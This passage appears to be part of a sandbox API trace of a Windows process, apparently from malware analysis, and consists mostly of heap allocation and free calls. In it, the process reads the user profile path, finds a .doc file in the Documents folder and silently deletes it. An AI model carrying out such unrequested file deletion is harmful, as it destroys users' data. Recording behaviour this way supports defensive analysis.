lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0259.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0259.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0259.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0259.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0259.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34facf0 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0259.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0259.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0259.955] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0259.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0259.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0259.956] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0259.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0259.956] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0259.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0259.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0259.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0259.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0259.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0259.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0259.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f2068 [0259.960] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/1fyOaNMvpe0HLFYMO.doc", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fyOaNMvpe0HLFYMO.doc", lpFilePart=0x8bedfc*="1fyOaNMvpe0HLFYMO.doc") returned 0x3d [0259.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0259.960] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fyOaNMvpe0HLFYMO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1fyoanmvpe0hlfymo.doc")) returned 0x20 [0259.960] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fyOaNMvpe0HLFYMO.doc", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972c9500, ftCreationTime.dwHighDateTime=0x1d4cdd0, ftLastAccessTime.dwLowDateTime=0x83454c40, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0x83454c40, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x1229a, dwReserved0=0x1980, dwReserved1=0x4, cFileName="1fyOaNMvpe0HLFYMO.doc", cAlternateFileName="1FYOAN~1.DOC")) returned 0xaa5860 [0259.960] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fyOaNMvpe0HLFYMO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1fyoanmvpe0hlfymo.doc")) returned 1 [0259.962] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972c9500, ftCreationTime.dwHighDateTime=0x1d4cdd0, ftLastAccessTime.dwLowDateTime=0x83454c40, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0x83454c40, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x1229a, dwReserved0=0x1980, dwReserved1=0x4, cFileName="1fyOaNMvpe0HLFYMO.doc", cAlternateFileName="1FYOAN~1.DOC")) returned 0 [0259.962] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0259.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0259.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0259.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0259.963] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0259.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0259.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0259.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0259.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0259.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0259.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0259.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0259.964] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0259.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0259.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0259.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0259.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0259.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0259.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0259.965] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0259.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0259.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0259.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0259.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0259.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0259.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0259.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0259.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0259.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0259.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0259.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0259.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0259.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0259.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0259.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0259.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0259.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0259.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0259.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f2068 [0259.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/1fyOaNMvpe0HLFYMO.doc", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fyOaNMvpe0HLFYMO.doc", lpFilePart=0x8bf658*="1fyOaNMvpe0HLFYMO.doc") returned 0x3d [0259.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0259.967] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fyOaNMvpe0HLFYMO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1fyoanmvpe0hlfymo.doc")) returned 0xffffffff [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: 